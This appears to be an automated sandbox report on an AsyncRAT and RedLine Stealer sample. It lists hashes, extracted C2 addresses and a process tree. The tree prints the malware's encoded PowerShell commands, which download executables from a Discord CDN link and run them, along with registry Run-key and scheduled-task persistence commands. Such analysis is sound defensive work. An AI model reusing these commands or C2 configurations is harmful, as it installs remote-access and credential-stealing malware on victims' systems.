Analysis

  • max time kernel
    14s
  • max time network
    150s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05-11-2022 10:01

General

  • Target

    62794bcc1fbf656453f96fa3c7d3db019963a805fa223bc4d2f8427d1294d50c.exe

  • Size

    171KB

  • MD5

    e5ba3869cadaeb82206a96d4749f1998

  • SHA1

    da714b64cb8ec12aa35b27c2f179cabd2ffa3335

  • SHA256

    62794bcc1fbf656453f96fa3c7d3db019963a805fa223bc4d2f8427d1294d50c

  • SHA512

    9248dbcddd6817f045d2778eea753828175881891b231bef5ade9d22400fb4213ab7643bdc303f06685aafd48562ce722dd29e806cb12165c25ae1e87ed5dcd8

  • SSDEEP

    3072:OgLaeRDcpY9KvuYF8LrN2hQSb7bEot4dfhQ+ibgTF6kD21qF2Gz:Oiao9KvuDLp2hGPCRb4FR

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

WindowsDefenderSmarttScreen

C2

217.64.31.3:9742

Mutex

WindowsDefenderSmarttScreen

Attributes
  • delay

    1

  • install

    false

  • install_file

    WindowsDefenderSmarttScreen.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

SecurityHealthServic

C2

20.8.122.174:31682

Mutex

SecurityHealthServic

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealthService

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    System Guard Runtime

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

SmartScreenDefender

C2

20.166.62.124:49264

Mutex

SmartScreenDefender

Attributes
  • delay

    1

  • install

    false

  • install_file

    SmartScreenDefender

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

Botnet

muck

C2

20.126.112.157:16733

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Async RAT payload 14 IoCs
  • Executes dropped EXE 12 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\62794bcc1fbf656453f96fa3c7d3db019963a805fa223bc4d2f8427d1294d50c.exe
    "C:\Users\Admin\AppData\Local\Temp\62794bcc1fbf656453f96fa3c7d3db019963a805fa223bc4d2f8427d1294d50c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderFileSecurity';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderFileSecurity' -Value '"C:\Users\Admin\AppData\Roaming\DefenderFileSecurity\DefenderFileSecurity.exe"' -PropertyType 'String'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3380
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /C schtasks /create /tn \DefenderFileSecurity /tr "C:\Users\Admin\AppData\Roaming\DefenderFileSecurity\DefenderFileSecurity.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1904
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn \DefenderFileSecurity /tr "C:\Users\Admin\AppData\Roaming\DefenderFileSecurity\DefenderFileSecurity.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:944
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE
        "C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADgANQAxADMANQAxADYAOAAyADYANgA5ADQALwBmAGQAcwBmADQAXwBwAHIAbwB0AGUAYwB0AGUAZAAuAGUAeABlACcALAAgADwAIwBrAHAAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAZgBxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAZgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMANAAyAGYAZAAyAC4AZQB4AGUAJwApACkAPAAjAGsAeABhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAZQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHMAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzADQAMgBmAGQAMgAuAGUAeABlACcAKQA8ACMAcABlAG0AIwA+AA=="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4436
          • C:\Users\Admin\AppData\Roaming\342fd2.exe
            "C:\Users\Admin\AppData\Roaming\342fd2.exe"
            5⤵
              PID:3736
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                #cmd
                6⤵
                  PID:4392
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SmartScreenDefender';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SmartScreenDefender' -Value '"C:\Users\Admin\AppData\Roaming\SmartScreenDefender\SmartScreenDefender.exe"' -PropertyType 'String'
                    7⤵
                      PID:200
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      7⤵
                        PID:4528
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        7⤵
                          PID:3312
                • C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE
                  "C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3700
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANQA2ADkANQA4ADAAMwAxADAANQA5ADkALwBkAGwAcABjAGQAaQBsAGQAbwBtAC4AZQB4AGUAJwAsACAAPAAjAGUAdABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQBxAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBzAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMgAxAGYAMgAuAGUAeABlACcAKQApADwAIwBiAG0AYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAHAAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB4AGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMgAxAGYAMgAuAGUAeABlACcAKQA8ACMAawBrAHIAIwA+AA=="
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2676
                    • C:\Users\Admin\AppData\Roaming\ab521f2.exe
                      "C:\Users\Admin\AppData\Roaming\ab521f2.exe"
                      5⤵
                        PID:744
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:192
                    • C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
                      "C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4308
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANAA3ADMAMQA3ADQAMgAyADkAMAAzADIALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBTAG0AYQByAHQAdABTAGMAcgBlAGUAbgAuAGUAeABlACcALAAgADwAIwBtAHUAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAaAByACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAawBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADQAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAcgBiAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADQAMQBmADIALgBlAHgAZQAnACkAPAAjAHEAZwBjACMAPgA="
                        4⤵
                          PID:2892
                          • C:\Users\Admin\AppData\Roaming\ab541f2.exe
                            "C:\Users\Admin\AppData\Roaming\ab541f2.exe"
                            5⤵
                              PID:3824
                        • C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE
                          "C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:5044
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMQA0ADIAOQA3ADcANgA2ADMAMAAyADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHQAZABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBlAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABhAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADgAMgAuAGUAeABlACcAKQApADwAIwBoAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHQAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbQBiAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADgAMgAuAGUAeABlACcAKQA8ACMAeQB5AGsAIwA+AA=="
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2900
                            • C:\Users\Admin\AppData\Roaming\ab82.exe
                              "C:\Users\Admin\AppData\Roaming\ab82.exe"
                              5⤵
                                PID:592
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  6⤵
                                    PID:1256
                            • C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOOL.EXE
                              "C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOOL.EXE"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4600
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANAAzADgAMwA1ADMAMQAyADEAMwA0ADEALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBTAG0AYQByAHQAdABTAGMAcgBlAGUAbgAuAGUAeABlACcALAAgADwAIwB2AHAAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAeAB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAZABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADQAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAbgByAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABrAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADQAMQBmADIALgBlAHgAZQAnACkAPAAjAG0AbABtACMAPgA="
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1116
                                • C:\Users\Admin\AppData\Roaming\ab241f2.exe
                                  "C:\Users\Admin\AppData\Roaming\ab241f2.exe"
                                  5⤵
                                    PID:3828
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 764
                                      6⤵
                                      • Program crash
                                      PID:4444
                              • C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDER.EXE
                                "C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDER.EXE"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4620
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMgA4ADYANAAwADEAOAA2ADcANwA5ADYALwBsAGMAbwBtAHAAbABjAG0AcABvAC4AZQB4AGUAJwAsACAAPAAjAG4AeABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwB4AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBqAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADIAOABmADIALgBlAHgAZQAnACkAKQA8ACMAcgBnAGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABuAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAbABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADgAZgAyAC4AZQB4AGUAJwApADwAIwBhAHMAdgAjAD4A"
                                  4⤵
                                    PID:1868
                                    • C:\Users\Admin\AppData\Roaming\ab28f2.exe
                                      "C:\Users\Admin\AppData\Roaming\ab28f2.exe"
                                      5⤵
                                        PID:5016
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          6⤵
                                            PID:4328
                                    • C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOS.EXE
                                      "C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOS.EXE"
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:1244
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANQA5ADUANgA4ADkAOAA1ADIAOQA4ADkALwBEAGUAZgBlAG4AZABlAHIAUAByAG8AdABlAGMAdAAuAGUAeABlACcALAAgADwAIwBxAHcAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAdwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAawB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAMgAxAGYAMgAuAGUAeABlACcAKQApADwAIwBqAGwAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHAAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABmAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMwAyADEAZgAyAC4AZQB4AGUAJwApADwAIwB4AHYAeQAjAD4A"
                                        4⤵
                                          PID:3688
                                          • C:\Users\Admin\AppData\Roaming\ab5321f2.exe
                                            "C:\Users\Admin\AppData\Roaming\ab5321f2.exe"
                                            5⤵
                                              PID:360
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderProtect';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderProtect' -Value '"C:\Users\Admin\AppData\Roaming\DefenderProtect\DefenderProtect.exe"' -PropertyType 'String'
                                                6⤵
                                                  PID:4644
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd" /C schtasks /create /tn \DefenderProtect /tr "C:\Users\Admin\AppData\Roaming\DefenderProtect\DefenderProtect.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                  6⤵
                                                    PID:4316
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /tn \DefenderProtect /tr "C:\Users\Admin\AppData\Roaming\DefenderProtect\DefenderProtect.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                      7⤵
                                                      • Creates scheduled task(s)
                                                      PID:4496
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    #cmd
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2892
                                            • C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDE.EXE
                                              "C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDE.EXE"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:4448
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAOAA4ADkAOAAzADIAMQA5ADQAMAA4ADkALwBXAGkAbgBkAG8AdwBzAFMAZQBpAHMAcwBvAG4ATQBhAG4AYQBnAGUALgBlAHgAZQAnACwAIAA8ACMAZwB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAHMAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGQAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAGIANQAzADEAMgAxAGYAMgAuAGUAeABlACcAKQApADwAIwBmAG0AagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGgAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBhAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMwAxADIAMQBmADIALgBlAHgAZQAnACkAPAAjAGMAZABtACMAPgA="
                                                4⤵
                                                  PID:1404
                                                  • C:\Users\Admin\AppData\Roaming\ab53121f2.exe
                                                    "C:\Users\Admin\AppData\Roaming\ab53121f2.exe"
                                                    5⤵
                                                      PID:1388
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        #cmd
                                                        6⤵
                                                          PID:440
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          #cmd
                                                          6⤵
                                                            PID:5016
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            #cmd
                                                            6⤵
                                                              PID:3360
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsSeissonManage';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsSeissonManage' -Value '"C:\Users\Admin\AppData\Roaming\WindowsSeissonManage\WindowsSeissonManage.exe"' -PropertyType 'String'
                                                                7⤵
                                                                  PID:4712
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                  7⤵
                                                                    PID:4216
                                                          • C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE
                                                            "C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:4356
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADgAMAA3ADMAMQA0ADAAMAA1ADYAMQAzADUALwBwAGwAZABlAGkAZQBtAHAAbABpAC4AZQB4AGUAJwAsACAAPAAjAHcAdQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABnAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBxAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMwBkADIAMwA0ADIALgBlAHgAZQAnACkAKQA8ACMAagByAHUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBjAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaAB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAZAAyADMANAAyAC4AZQB4AGUA